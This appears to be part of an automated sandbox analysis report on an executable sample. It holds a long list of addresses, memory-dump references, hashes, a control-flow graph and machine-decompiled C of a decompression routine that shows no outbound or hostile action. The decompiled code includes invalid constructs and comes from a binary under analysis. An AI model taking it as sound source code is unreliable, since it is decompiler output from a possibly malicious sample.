                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407137
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407056
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00000000
                                                                                    0x00407482
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x004075e5
                                                                                    0x004075eb
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407399

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 761 4070ab-4070af 762 4070b5-4070b9 761->762 763 407166-407178 761->763 764 4075fa 762->764 765 4070bf-4070d3 762->765 773 4073cb-4073e0 763->773 766 4075fd-407601 764->766 767 407599-4075a3 765->767 768 4070d9-4070e2 765->768 770 4075e5-4075f8 767->770 771 4070e4 768->771 772 4070e7-407117 768->772 770->766 771->772 777 406be3-406bec 772->777 774 4073e2-4073f8 773->774 775 4073fa-407410 773->775 778 407413-40741a 774->778 775->778 777->764 779 406bf2 777->779 780 407441-40744d 778->780 781 40741c-407420 778->781 782 406bf9-406bfd 779->782 783 406d39-406d5a 779->783 784 406c9e-406ca2 779->784 785 406d0e-406d12 779->785 780->777 786 407426-40743e 781->786 787 4075cf-4075d9 781->787 782->770 789 406c03-406c10 782->789 783->773 792 406ca8-406cc1 784->792 793 40754e-407558 784->793 790 406d18-406d2c 785->790 791 40755d-407567 785->791 786->780 787->770 789->764 794 406c16-406c5c 789->794 795 406d2f-406d37 790->795 791->770 796 406cc4-406cc8 792->796 793->770 797 406c84-406c86 794->797 798 406c5e-406c62 794->798 795->783 795->785 796->784 799 406cca-406cd0 796->799 804 406c94-406c9c 797->804 805 406c88-406c92 797->805 802 406c64-406c67 GlobalFree 798->802 803 406c6d-406c7b GlobalAlloc 798->803 800 406cd2-406cd9 799->800 801 406cfa-406d0c 799->801 806 406ce4-406cf4 GlobalAlloc 800->806 807 406cdb-406cde GlobalFree 800->807 801->795 802->803 803->764 808 406c81 803->808 804->796 805->804 805->805 806->764 806->801 807->806 808->797
                                                                                    C-Code - Quality: 98%
                                                                                    			E004070AB() {
                                                                                    				unsigned short _t532;
                                                                                    				signed int _t533;
                                                                                    				void _t534;
                                                                                    				void* _t535;
                                                                                    				signed int _t536;
                                                                                    				signed int _t565;
                                                                                    				signed int _t568;
                                                                                    				signed int _t589;
                                                                                    				signed int* _t606;
                                                                                    				void* _t613;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					if( *(_t613 - 0x40) != 0) {
                                                                                    						L89:
                                                                                    						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                    						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                    						L69:
                                                                                    						_t606 =  *(_t613 - 0x58);
                                                                                    						 *(_t613 - 0x84) = 0x12;
                                                                                    						L132:
                                                                                    						 *(_t613 - 0x54) = _t606;
                                                                                    						L133:
                                                                                    						_t532 =  *_t606;
                                                                                    						_t589 = _t532 & 0x0000ffff;
                                                                                    						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                    						if( *(_t613 - 0xc) >= _t565) {
                                                                                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                    							 *(_t613 - 0x40) = 1;
                                                                                    							_t533 = _t532 - (_t532 >> 5);
                                                                                    							 *_t606 = _t533;
                                                                                    						} else {
                                                                                    							 *(_t613 - 0x10) = _t565;
                                                                                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                    						}
                                                                                    						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                    							L139:
                                                                                    							_t534 =  *(_t613 - 0x84);
                                                                                    							L140:
                                                                                    							 *(_t613 - 0x88) = _t534;
                                                                                    							goto L1;
                                                                                    						} else {
                                                                                    							L137:
                                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                                    								 *(_t613 - 0x88) = 5;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                    							goto L139;
                                                                                    						}
                                                                                    					} else {
                                                                                    						if( *(__ebp - 0x60) == 0) {
                                                                                    							L171:
                                                                                    							_t536 = _t535 | 0xffffffff;
                                                                                    							L172:
                                                                                    							return _t536;
                                                                                    						}
                                                                                    						__eax = 0;
                                                                                    						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                    						0 | _t258 = _t258 + _t258 + 9;
                                                                                    						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                    						L75:
                                                                                    						if( *(__ebp - 0x64) == 0) {
                                                                                    							 *(__ebp - 0x88) = 0x1b;
                                                                                    							L170:
                                                                                    							_t568 = 0x22;
                                                                                    							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                    							_t536 = 0;
                                                                                    							goto L172;
                                                                                    						}
                                                                                    						__eax =  *(__ebp - 0x14);
                                                                                    						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    						if(__eax >=  *(__ebp - 0x74)) {
                                                                                    							__eax = __eax +  *(__ebp - 0x74);
                                                                                    						}
                                                                                    						__edx =  *(__ebp - 8);
                                                                                    						__cl =  *(__eax + __edx);
                                                                                    						__eax =  *(__ebp - 0x14);
                                                                                    						 *(__ebp - 0x5c) = __cl;
                                                                                    						 *(__eax + __edx) = __cl;
                                                                                    						__eax = __eax + 1;
                                                                                    						__edx = 0;
                                                                                    						_t274 = __eax %  *(__ebp - 0x74);
                                                                                    						__eax = __eax /  *(__ebp - 0x74);
                                                                                    						__edx = _t274;
                                                                                    						__eax =  *(__ebp - 0x68);
                                                                                    						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    						_t283 = __ebp - 0x64;
                                                                                    						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                    						 *( *(__ebp - 0x68)) = __cl;
                                                                                    						L79:
                                                                                    						 *(__ebp - 0x14) = __edx;
                                                                                    						L80:
                                                                                    						 *(__ebp - 0x88) = 2;
                                                                                    					}
                                                                                    					L1:
                                                                                    					_t535 =  *(_t613 - 0x88);
                                                                                    					if(_t535 > 0x1c) {
                                                                                    						goto L171;
                                                                                    					}
                                                                                    					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                                    						case 0:
                                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    							_t535 =  *( *(_t613 - 0x70));
                                                                                    							if(_t535 > 0xe1) {
                                                                                    								goto L171;
                                                                                    							}
                                                                                    							_t539 = _t535 & 0x000000ff;
                                                                                    							_push(0x2d);
                                                                                    							asm("cdq");
                                                                                    							_pop(_t570);
                                                                                    							_push(9);
                                                                                    							_pop(_t571);
                                                                                    							_t609 = _t539 / _t570;
                                                                                    							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                    							asm("cdq");
                                                                                    							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                    							 *(_t613 - 0x3c) = _t604;
                                                                                    							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                    							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                    							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                    							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                    								L10:
                                                                                    								if(_t612 == 0) {
                                                                                    									L12:
                                                                                    									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                    									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                    									goto L15;
                                                                                    								} else {
                                                                                    									goto L11;
                                                                                    								}
                                                                                    								do {
                                                                                    									L11:
                                                                                    									_t612 = _t612 - 1;
                                                                                    									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                    								} while (_t612 != 0);
                                                                                    								goto L12;
                                                                                    							}
                                                                                    							if( *(_t613 - 4) != 0) {
                                                                                    								GlobalFree( *(_t613 - 4));
                                                                                    							}
                                                                                    							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                    							 *(_t613 - 4) = _t535;
                                                                                    							if(_t535 == 0) {
                                                                                    								goto L171;
                                                                                    							} else {
                                                                                    								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                    								goto L10;
                                                                                    							}
                                                                                    						case 1:
                                                                                    							L13:
                                                                                    							__eflags =  *(_t613 - 0x6c);
                                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                                    								 *(_t613 - 0x88) = 1;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                    							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                    							_t45 = _t613 - 0x48;
                                                                                    							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                    							__eflags =  *_t45;
                                                                                    							L15:
                                                                                    							if( *(_t613 - 0x48) < 4) {
                                                                                    								goto L13;
                                                                                    							}
                                                                                    							_t547 =  *(_t613 - 0x40);
                                                                                    							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                    								L20:
                                                                                    								 *(_t613 - 0x48) = 5;
                                                                                    								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                    								goto L23;
                                                                                    							}
                                                                                    							 *(_t613 - 0x74) = _t547;
                                                                                    							if( *(_t613 - 8) != 0) {
                                                                                    								GlobalFree( *(_t613 - 8));
                                                                                    							}
                                                                                    							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                    							 *(_t613 - 8) = _t535;
                                                                                    							if(_t535 == 0) {
                                                                                    								goto L171;
                                                                                    							} else {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    						case 2:
                                                                                    							L24:
                                                                                    							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                    							 *(_t613 - 0x84) = 6;
                                                                                    							 *(_t613 - 0x4c) = _t554;
                                                                                    							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                                    							goto L132;
                                                                                    						case 3:
                                                                                    							L21:
                                                                                    							__eflags =  *(_t613 - 0x6c);
                                                                                    							if( *(_t613 - 0x6c) == 0) {
                                                                                    								 *(_t613 - 0x88) = 3;
                                                                                    								goto L170;
                                                                                    							}
                                                                                    							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                    							_t67 = _t613 - 0x70;
                                                                                    							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                    							__eflags =  *_t67;
                                                                                    							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                    							L23:
                                                                                    							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                    							if( *(_t613 - 0x48) != 0) {
                                                                                    								goto L21;
